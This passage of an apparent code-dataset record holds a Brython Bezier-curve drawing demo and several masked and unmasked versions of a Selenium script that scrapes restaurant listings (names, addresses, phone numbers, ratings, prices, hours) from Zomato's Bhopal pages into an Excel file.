0, 200)\ndragObj1 = drag2d(cgo, null, dragC1, null)\nc1 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc1.enableDrag(dragObj1)\ndragObj2 = drag2d(cgo, null, dragC2, null)\nc2 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc2.enableDrag(dragObj2)\ndragObj3 = drag2d(cgo, null, dragC3, null)\nc3 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc3.enableDrag(dragObj3)\ndrawCurve()\n",
"step-4": "from javascript import JSConstructor\nfrom javascript import JSObject\ncango = JSConstructor(Cango2D)\nshapes2d = JSObject(shapes2D)\ntweener = JSConstructor(Tweener)\ndrag2d = JSConstructor(Drag2D)\nsvgtocgo2d = JSConstructor(svgToCgo2D)\ncgo = cango('plotarea')\nx1, y1 = 40, 20\ncx1, cy1 = 90, 120\nx2, y2 = 120, 100\ncx2, cy2 = 130, 20\ncx3, cy3 = 150, 120\nx3, y3 = 180, 60\n\n\ndef dragC1(mousePos):\n global cx1, cy1\n cx1 = mousePos.x\n cy1 = mousePos.y\n drawCurve()\n\n\ndef dragC2(mousePos):\n global cx2, cy2\n cx2 = mousePos.x\n cy2 = mousePos.y\n drawCurve()\n\n\ndef dragC3(mousePos):\n global cx3, cy3\n cx3 = mousePos.x\n cy3 = mousePos.y\n drawCurve()\n\n\ndef drawCurve():\n qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]\n qbez = cgo.compilePath(qbezdata, 'blue')\n cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]\n cbez = cgo.compilePath(cbezdata, 'green')\n data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]\n L1 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x2, y2, 'L', cx2, cy2]\n L2 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x3, y3, 'L', cx3, cy3]\n L3 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n c1.transform.reset()\n c1.transform.translate(cx1, cy1)\n c2.transform.reset()\n c2.transform.translate(cx2, cy2)\n c3.transform.reset()\n c3.transform.translate(cx3, cy3)\n grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)\n cgo.renderFrame(grp)\n\n\ncgo.clearCanvas('lightyellow')\ncgo.setWorldCoords(0, 0, 200)\ndragObj1 = drag2d(cgo, null, dragC1, null)\nc1 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc1.enableDrag(dragObj1)\ndragObj2 = drag2d(cgo, null, dragC2, null)\nc2 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc2.enableDrag(dragObj2)\ndragObj3 = drag2d(cgo, null, dragC3, null)\nc3 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc3.enableDrag(dragObj3)\ndrawCurve()\n",
"step-5": "from javascript import JSConstructor\nfrom javascript import JSObject\n \ncango = JSConstructor(Cango2D)\nshapes2d = JSObject(shapes2D)\ntweener = JSConstructor(Tweener)\ndrag2d = JSConstructor(Drag2D)\nsvgtocgo2d = JSConstructor(svgToCgo2D)\ncgo = cango(\"plotarea\")\nx1, y1 = 40, 20\ncx1, cy1 = 90, 120\nx2, y2 = 120, 100\ncx2, cy2 = 130, 20\ncx3, cy3 = 150, 120\nx3, y3 = 180, 60\n\n#called in scope of dragNdrop obj\ndef dragC1(mousePos):\n global cx1, cy1\n cx1 = mousePos.x\n cy1 = mousePos.y\n drawCurve()\n\ndef dragC2(mousePos):\n global cx2, cy2\n cx2 = mousePos.x\n cy2 = mousePos.y\n drawCurve()\n\ndef dragC3(mousePos):\n global cx3, cy3\n cx3 = mousePos.x\n cy3 = mousePos.y\n drawCurve()\n\ndef drawCurve():\n # curve change shape so it must be re-compiled each time\n # draw a quadratic bezier from x1,y2 to x2,y2\n qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]\n qbez = cgo.compilePath(qbezdata, 'blue')\n cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]\n cbez = cgo.compilePath(cbezdata, 'green')\n # show lines to control point\n data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]\n # semi-transparent gray\n L1 = cgo.compilePath(data, \"rgba(0, 0, 0, 0.2)\")\n data = ['M', x2, y2, 'L', cx2, cy2]\n L2 = cgo.compilePath(data, \"rgba(0, 0, 0, 0.2)\")\n data = ['M', x3, y3, 'L', cx3, cy3]\n L3 = cgo.compilePath(data, \"rgba(0, 0, 0, 0.2)\")\n # draw draggable control points\n c1.transform.reset()\n c1.transform.translate(cx1, cy1)\n c2.transform.reset()\n c2.transform.translate(cx2, cy2)\n c3.transform.reset()\n c3.transform.translate(cx3, cy3)\n grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)\n cgo.renderFrame(grp)\n\ncgo.clearCanvas(\"lightyellow\")\ncgo.setWorldCoords(0, 0, 200)\n\n# pre-compile the draggable control point\ndragObj1 = drag2d(cgo, null, dragC1, null)\nc1 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc1.enableDrag(dragObj1)\ndragObj2 = drag2d(cgo, null, dragC2, null)\nc2 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc2.enableDrag(dragObj2)\ndragObj3 = drag2d(cgo, null, dragC3, null)\nc3 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)\nc3.enableDrag(dragObj3)\n\ndrawCurve()",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
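For reference, the quadratic segment the code above drags around ('M', x1, y1, 'Q', cx1, cy1, x2, y2) can be evaluated directly; a small pure-Python sketch of the Bernstein form, independent of Cango2D:

def quad_bezier_point(t, p0, c, p1):
    # B(t) = (1-t)^2 * P0 + 2t(1-t) * C + t^2 * P1, for t in [0, 1]
    u = 1 - t
    return (u * u * p0[0] + 2 * u * t * c[0] + t * t * p1[0],
            u * u * p0[1] + 2 * u * t * c[1] + t * t * p1[1])

# midpoint of the initial curve: start (40, 20), control (90, 120), end (120, 100)
print(quad_bezier_point(0.5, (40, 20), (90, 120), (120, 100)))  # (85.0, 90.0)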
<|reserved_special_token_0|>
def traverse(a, b):
temp = []
for i in range(a, b, 1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name(
'result-title.hover_feedback.zred.bold.ln24.fontsize0')
add_list = browser.find_elements_by_class_name(
'col-m-16.search-result-address.grey-text.nowrap.ln22')
phone_list = browser.find_elements_by_class_name(
'item.res-snippet-ph-info')
for i in range(1, 18):
if i == 4 or i == 10:
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[2]/span[2]').text)
except Exception as e:
z_costoftwo.append('NILL')
try:
z_hours.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[3]/div[1]').text)
except Exception as e1:
z_hours.append('NILL')
try:
z_votes.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'
).text)
except Exception as e1:
z_votes.append('NEW')
try:
z_rating_list.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'
).text)
except Exception as e:
z_rating_list.append('NILL')
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute('data-phone-no-str'))
if int(a) < 6:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'
)
clk.click()
else:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'
)
clk.click()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
browser.get('https://www.zomato.com/bhopal/dinner')
<|reserved_special_token_0|>
def traverse(a, b):
temp = []
for i in range(a, b, 1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name(
'result-title.hover_feedback.zred.bold.ln24.fontsize0')
add_list = browser.find_elements_by_class_name(
'col-m-16.search-result-address.grey-text.nowrap.ln22')
phone_list = browser.find_elements_by_class_name(
'item.res-snippet-ph-info')
for i in range(1, 18):
if i == 4 or i == 10:
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[2]/span[2]').text)
except Exception as e:
z_costoftwo.append('NILL')
try:
z_hours.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[3]/div[1]').text)
except Exception as e1:
z_hours.append('NILL')
try:
z_votes.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'
).text)
except Exception as e1:
z_votes.append('NEW')
try:
z_rating_list.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'
).text)
except Exception as e:
z_rating_list.append('NILL')
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute('data-phone-no-str'))
if int(a) < 6:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'
)
clk.click()
else:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'
)
clk.click()
traverse(1, 6)
traverse(6, 11)
traverse(11, 16)
traverse(16, 21)
traverse(21, 26)
for i in range(0, len(z_hotel_list), 1):
sheet1.write(i, 0, z_hotel_list[i])
for i in range(0, len(z_phone_list), 1):
sheet1.write(i, 1, z_phone_list[i])
for i in range(0, len(z_address_list), 1):
sheet1.write(i, 2, z_address_list[i])
for i in range(0, len(z_rating_list)):
sheet1.write(i, 3, z_rating_list[i])
for i in range(0, len(z_costoftwo)):
sheet1.write(i, 4, z_costoftwo[i])
for i in range(0, len(z_hours)):
sheet1.write(i, 5, z_hours[i])
for i in range(0, len(z_votes)):
sheet1.write(i, 6, z_votes[i])
print('Writing to excel Finished')
book.save('ZomatoBhopal(data).xls')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
book = xlwt.Workbook(encoding='utf-8')
sheet1 = book.add_sheet('Sheet 1')
browser = webdriver.Firefox()
browser.get('https://www.zomato.com/bhopal/dinner')
z_hotel_list = []
z_address_list = []
z_phone_list = []
z_rating_list = []
z_costoftwo = []
z_votes = []
z_hours = []
def traverse(a, b):
temp = []
for i in range(a, b, 1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name(
'result-title.hover_feedback.zred.bold.ln24.fontsize0')
add_list = browser.find_elements_by_class_name(
'col-m-16.search-result-address.grey-text.nowrap.ln22')
phone_list = browser.find_elements_by_class_name(
'item.res-snippet-ph-info')
for i in range(1, 18):
if i == 4 or i == 10:
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[2]/span[2]').text)
except Exception as e:
z_costoftwo.append('NILL')
try:
z_hours.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[3]/div[1]').text)
except Exception as e1:
z_hours.append('NILL')
try:
z_votes.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'
).text)
except Exception as e1:
z_votes.append('NEW')
try:
z_rating_list.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'
).text)
except Exception as e:
z_rating_list.append('NILL')
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute('data-phone-no-str'))
if int(a) < 6:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'
)
clk.click()
else:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'
)
clk.click()
traverse(1, 6)
traverse(6, 11)
traverse(11, 16)
traverse(16, 21)
traverse(21, 26)
for i in range(0, len(z_hotel_list), 1):
sheet1.write(i, 0, z_hotel_list[i])
for i in range(0, len(z_phone_list), 1):
sheet1.write(i, 1, z_phone_list[i])
for i in range(0, len(z_address_list), 1):
sheet1.write(i, 2, z_address_list[i])
for i in range(0, len(z_rating_list)):
sheet1.write(i, 3, z_rating_list[i])
for i in range(0, len(z_costoftwo)):
sheet1.write(i, 4, z_costoftwo[i])
for i in range(0, len(z_hours)):
sheet1.write(i, 5, z_hours[i])
for i in range(0, len(z_votes)):
sheet1.write(i, 6, z_votes[i])
print('Writing to excel Finished')
book.save('ZomatoBhopal(data).xls')
<|reserved_special_token_1|>
from selenium import webdriver
import time
import xlwt
from JD_PhoneNo import get_phone_no
book = xlwt.Workbook(encoding='utf-8')
sheet1 = book.add_sheet('Sheet 1')
browser = webdriver.Firefox()
browser.get('https://www.zomato.com/bhopal/dinner')
z_hotel_list = []
z_address_list = []
z_phone_list = []
z_rating_list = []
z_costoftwo = []
z_votes = []
z_hours = []
def traverse(a, b):
temp = []
for i in range(a, b, 1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name(
'result-title.hover_feedback.zred.bold.ln24.fontsize0')
add_list = browser.find_elements_by_class_name(
'col-m-16.search-result-address.grey-text.nowrap.ln22')
phone_list = browser.find_elements_by_class_name(
'item.res-snippet-ph-info')
for i in range(1, 18):
if i == 4 or i == 10:
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[2]/span[2]').text)
except Exception as e:
z_costoftwo.append('NILL')
try:
z_hours.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[3]/div[3]/div[1]').text)
except Exception as e1:
z_hours.append('NILL')
try:
z_votes.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'
).text)
except Exception as e1:
z_votes.append('NEW')
try:
z_rating_list.append(browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['
+ str(i) +
']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'
).text)
except Exception as e:
z_rating_list.append('NILL')
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute('data-phone-no-str'))
if int(a) < 6:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'
)
clk.click()
else:
clk = browser.find_element_by_xpath(
'/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'
)
clk.click()
traverse(1, 6)
traverse(6, 11)
traverse(11, 16)
traverse(16, 21)
traverse(21, 26)
for i in range(0, len(z_hotel_list), 1):
sheet1.write(i, 0, z_hotel_list[i])
for i in range(0, len(z_phone_list), 1):
sheet1.write(i, 1, z_phone_list[i])
for i in range(0, len(z_address_list), 1):
sheet1.write(i, 2, z_address_list[i])
for i in range(0, len(z_rating_list)):
sheet1.write(i, 3, z_rating_list[i])
for i in range(0, len(z_costoftwo)):
sheet1.write(i, 4, z_costoftwo[i])
for i in range(0, len(z_hours)):
sheet1.write(i, 5, z_hours[i])
for i in range(0, len(z_votes)):
sheet1.write(i, 6, z_votes[i])
print('Writing to excel Finished')
book.save('ZomatoBhopal(data).xls')
<|reserved_special_token_1|>
from selenium import webdriver
import time
import xlwt
from JD_PhoneNo import get_phone_no
book = xlwt.Workbook(encoding="utf-8")
sheet1=book.add_sheet("Sheet 1")
browser = webdriver.Firefox()
browser.get("https://www.zomato.com/bhopal/dinner")
z_hotel_list = []
z_address_list = []
z_phone_list = []
z_rating_list = []
z_costoftwo = []
z_votes = []
z_hours = []
def traverse(a,b):
temp = []
for i in range(a,b,1):
a = str(i)
button = browser.find_element_by_link_text(a)
button.click()
name_list = browser.find_elements_by_class_name("result-title.hover_feedback.zred.bold.ln24.fontsize0")
add_list = browser.find_elements_by_class_name("col-m-16.search-result-address.grey-text.nowrap.ln22")
phone_list = browser.find_elements_by_class_name("item.res-snippet-ph-info")
for i in range(1,18):
if(i==4 or i==10 ):
continue
else:
try:
z_costoftwo.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[3]/div[2]/span[2]").text)
except Exception as e:
z_costoftwo.append("NILL")
try:
z_hours.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[3]/div[3]/div[1]").text)
except Exception as e1:
z_hours.append("NILL")
try:
z_votes.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span").text)
except Exception as e1:
z_votes.append("NEW")
try:
z_rating_list.append(browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div["+str(i)+"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]").text)
except Exception as e:
z_rating_list.append("NILL")
for names in name_list:
z_hotel_list.append(names.text)
temp.append(names.text)
for addname in add_list:
z_address_list.append(addname.text)
for phonename in phone_list:
z_phone_list.append(phonename.get_attribute("data-phone-no-str"))
if(int(a)<6):
clk = browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]")
clk.click()
else:
clk = browser.find_element_by_xpath("/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]")
clk.click()
traverse(1,6)
traverse(6,11)
traverse(11,16)
traverse(16,21)
traverse(21,26)
# traverse(26,31)
# traverse(31,36)
# traverse(36,41)
# traverse(41,46)
# traverse(46,51)
# traverse(51,56)
# for i in range(1,5,10):
# traverse(i,i+5)
# traverse(i+5,i+10)
for i in range(0,len(z_hotel_list),1):
sheet1.write(i,0,z_hotel_list[i])
for i in range(0, len(z_phone_list), 1):
sheet1.write(i,1,z_phone_list[i])
for i in range(0, len(z_address_list), 1):
sheet1.write(i, 2, z_address_list[i])
for i in range(0,len(z_rating_list)):
sheet1.write(i,3,z_rating_list[i])
for i in range(0, len(z_costoftwo)):
sheet1.write(i, 4, z_costoftwo[i])
for i in range(0, len(z_hours)):
sheet1.write(i, 5, z_hours[i])
for i in range(0, len(z_votes)):
sheet1.write(i, 6, z_votes[i])
print("Writing to excel Finished")
book.save("ZomatoBhopal(data).xls")
|
flexible
|
{
"blob_id": "96425986305171a9d23231f60b35dcbcbbd12d2d",
"index": 7995,
"step-1": "<mask token>\n\n\ndef traverse(a, b):\n temp = []\n for i in range(a, b, 1):\n a = str(i)\n button = browser.find_element_by_link_text(a)\n button.click()\n name_list = browser.find_elements_by_class_name(\n 'result-title.hover_feedback.zred.bold.ln24.fontsize0')\n add_list = browser.find_elements_by_class_name(\n 'col-m-16.search-result-address.grey-text.nowrap.ln22')\n phone_list = browser.find_elements_by_class_name(\n 'item.res-snippet-ph-info')\n for i in range(1, 18):\n if i == 4 or i == 10:\n continue\n else:\n try:\n z_costoftwo.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[2]/span[2]').text)\n except Exception as e:\n z_costoftwo.append('NILL')\n try:\n z_hours.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[3]/div[1]').text)\n except Exception as e1:\n z_hours.append('NILL')\n try:\n z_votes.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'\n ).text)\n except Exception as e1:\n z_votes.append('NEW')\n try:\n z_rating_list.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'\n ).text)\n except Exception as e:\n z_rating_list.append('NILL')\n for names in name_list:\n z_hotel_list.append(names.text)\n temp.append(names.text)\n for addname in add_list:\n z_address_list.append(addname.text)\n for phonename in phone_list:\n z_phone_list.append(phonename.get_attribute('data-phone-no-str'))\n if int(a) < 6:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'\n )\n clk.click()\n else:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'\n )\n clk.click()\n\n\n<mask token>\n",
"step-2": "<mask token>\nbrowser.get('https://www.zomato.com/bhopal/dinner')\n<mask token>\n\n\ndef traverse(a, b):\n temp = []\n for i in range(a, b, 1):\n a = str(i)\n button = browser.find_element_by_link_text(a)\n button.click()\n name_list = browser.find_elements_by_class_name(\n 'result-title.hover_feedback.zred.bold.ln24.fontsize0')\n add_list = browser.find_elements_by_class_name(\n 'col-m-16.search-result-address.grey-text.nowrap.ln22')\n phone_list = browser.find_elements_by_class_name(\n 'item.res-snippet-ph-info')\n for i in range(1, 18):\n if i == 4 or i == 10:\n continue\n else:\n try:\n z_costoftwo.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[2]/span[2]').text)\n except Exception as e:\n z_costoftwo.append('NILL')\n try:\n z_hours.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[3]/div[1]').text)\n except Exception as e1:\n z_hours.append('NILL')\n try:\n z_votes.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'\n ).text)\n except Exception as e1:\n z_votes.append('NEW')\n try:\n z_rating_list.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'\n ).text)\n except Exception as e:\n z_rating_list.append('NILL')\n for names in name_list:\n z_hotel_list.append(names.text)\n temp.append(names.text)\n for addname in add_list:\n z_address_list.append(addname.text)\n for phonename in phone_list:\n z_phone_list.append(phonename.get_attribute('data-phone-no-str'))\n if int(a) < 6:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'\n )\n clk.click()\n else:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'\n )\n clk.click()\n\n\ntraverse(1, 6)\ntraverse(6, 11)\ntraverse(11, 16)\ntraverse(16, 21)\ntraverse(21, 26)\nfor i in range(0, len(z_hotel_list), 1):\n sheet1.write(i, 0, z_hotel_list[i])\nfor i in range(0, len(z_phone_list), 1):\n sheet1.write(i, 1, z_phone_list[i])\nfor i in range(0, len(z_address_list), 1):\n sheet1.write(i, 2, z_address_list[i])\nfor i in range(0, len(z_rating_list)):\n sheet1.write(i, 3, z_rating_list[i])\nfor i in range(0, len(z_costoftwo)):\n sheet1.write(i, 4, z_costoftwo[i])\nfor i in range(0, len(z_hours)):\n sheet1.write(i, 5, z_hours[i])\nfor i in range(0, len(z_votes)):\n sheet1.write(i, 6, z_votes[i])\nprint('Writing to excel Finished')\nbook.save('ZomatoBhopal(data).xls')\n",
"step-3": "<mask token>\nbook = xlwt.Workbook(encoding='utf-8')\nsheet1 = book.add_sheet('Sheet 1')\nbrowser = webdriver.Firefox()\nbrowser.get('https://www.zomato.com/bhopal/dinner')\nz_hotel_list = []\nz_address_list = []\nz_phone_list = []\nz_rating_list = []\nz_costoftwo = []\nz_votes = []\nz_hours = []\n\n\ndef traverse(a, b):\n temp = []\n for i in range(a, b, 1):\n a = str(i)\n button = browser.find_element_by_link_text(a)\n button.click()\n name_list = browser.find_elements_by_class_name(\n 'result-title.hover_feedback.zred.bold.ln24.fontsize0')\n add_list = browser.find_elements_by_class_name(\n 'col-m-16.search-result-address.grey-text.nowrap.ln22')\n phone_list = browser.find_elements_by_class_name(\n 'item.res-snippet-ph-info')\n for i in range(1, 18):\n if i == 4 or i == 10:\n continue\n else:\n try:\n z_costoftwo.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[2]/span[2]').text)\n except Exception as e:\n z_costoftwo.append('NILL')\n try:\n z_hours.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[3]/div[1]').text)\n except Exception as e1:\n z_hours.append('NILL')\n try:\n z_votes.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'\n ).text)\n except Exception as e1:\n z_votes.append('NEW')\n try:\n z_rating_list.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'\n ).text)\n except Exception as e:\n z_rating_list.append('NILL')\n for names in name_list:\n z_hotel_list.append(names.text)\n temp.append(names.text)\n for addname in add_list:\n z_address_list.append(addname.text)\n for phonename in phone_list:\n z_phone_list.append(phonename.get_attribute('data-phone-no-str'))\n if int(a) < 6:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'\n )\n clk.click()\n else:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'\n )\n clk.click()\n\n\ntraverse(1, 6)\ntraverse(6, 11)\ntraverse(11, 16)\ntraverse(16, 21)\ntraverse(21, 26)\nfor i in range(0, len(z_hotel_list), 